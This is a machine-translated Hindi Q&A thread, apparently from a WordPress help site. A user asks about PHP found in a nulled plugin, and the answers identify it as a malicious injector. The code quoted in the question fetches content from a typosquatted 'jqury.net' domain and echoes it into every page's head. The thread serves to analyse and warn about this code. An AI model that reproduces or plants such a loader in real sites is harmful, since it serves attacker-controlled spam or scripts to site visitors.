मुझे यह एक प्लगइन में मिला। यह क्या करता है? यह खतरनाक है?


17

मुझे यह एक प्लगइन में मिला। यह क्या करता है? यह खतरनाक है?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

5
कौन सा प्लगइन है?
डैनियल

क्या आपको आधिकारिक WP साइट से प्लगइन मिला है?
वह ब्राजील के लड़के

1
यह एक प्लगइन में था, मेरे एक ग्राहक ने मुझे अपने नेटवर्क इंस्टॉल पर चलाना चाहा। प्लगइन इसे wp-admin में चलाना चाहता था। इसे पढ़ने के बाद मैंने उनसे पूछा कि यह कहां से आया है। इसकी एक अशक्त प्लगइन एक धार से। संक्षिप्त उत्तर erm NO xXx था
सोफिया रोज

जवाबों:


16

यह स्पैम युक्त मार्कअप के एक ब्लॉक को लोड करता है (मैंने स्रोत के बारे में थोड़ा सा पोस्ट करने के बारे में सोचा था लेकिन मैं किसी डोमेन से सामग्री का विज्ञापन नहीं करना चाहता) जो कि डोमेन की एक करीबी गलत वर्तनी है http://jquery.com/- - jQuery द्वारा उपयोग किया जाता है एक प्रतिष्ठित और लोकप्रिय जावास्क्रिप्ट लाइब्रेरी और एक वर्डप्रेस जो कोर में शामिल है। मुझे लगता है कि यह विचार उस पुस्तकालय को लोड करता हुआ प्रतीत होता है, जब वास्तव में कुछ अलग लोड हो रहा होता है।

और यह jQuery लोड करने के लिए प्रकट होने का प्रयास करने के अन्य तरीकों में है। चर नाम पर ध्यान दें $jquery

यह दुर्भावनापूर्ण स्क्रिप्ट को भी लोड करने का प्रयास कर सकता है। मैंने जाँच नहीं की। मैं होगा निश्चित रूप से यह खतरनाक उस पृष्ठ पर सामग्री कभी भी डोमेन नियंत्रकों यह की तरह महसूस बदल सकते हैं, खासकर जब से कहते हैं।

कम से कम यह आपकी साइट को नुकसान पहुंचाने वाला है क्योंकि खोज इंजन स्पैम फैलाने वाली साइटों पर नज़र डालते हैं।

इसका उपयोग न करें। यह साइट चलाने वाले लोगों के अलावा आपके लिए या वेब पर किसी और के लिए फायदेमंद नहीं है। यदि आपको यह एक प्रतिष्ठित साइट पर मिला है, तो उन्हें रिपोर्ट करें।


7

हां, यह खतरनाक कोड है, स्पैम साइट से सामग्री लोड करना।

आपने प्लगइन का नाम नहीं दिया है, लेकिन अगर आपको यह कोड अपनी वेबसाइट पर स्थापित होने के बाद मिला है, तो संभव है कि प्लगइन कोड इस तरह से डेवलपर से नहीं आया था, लेकिन इसके स्थापित होने के बाद इसे हैक कर लिया गया था। यदि यह मामला है, तो आपको इस प्लगइन की तुलना में अपनी वेबसाइट पर अधिक दुर्भावनापूर्ण कोड मिल सकते हैं।

जहाँ भी आपको मूल रूप से प्लगइन मिला है, वहाँ से डाउनलोड किए गए प्लगइन कोड की जाँच करें और देखें कि क्या यह दुर्भावनापूर्ण कोड मूल रूप से था। यदि नहीं, तो आपकी साइट हैक हो गई है। यदि आप यह निर्धारित करते हैं कि ऐसा होना है, तो कोडेक्स के इस लेख को पढ़ें ।


3
यह एक प्लगइन में था, मेरे एक ग्राहक ने मुझे अपने नेटवर्क इंस्टॉल पर चलाना चाहा। प्लगइन इसे wp-admin में चलाना चाहता था। इसे पढ़ने के बाद मैंने उनसे पूछा कि यह कहां से आया है। इसकी एक अशक्त प्लगइन एक धार से। संक्षिप्त उत्तर erm NO xXx था
सोफिया रोज
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.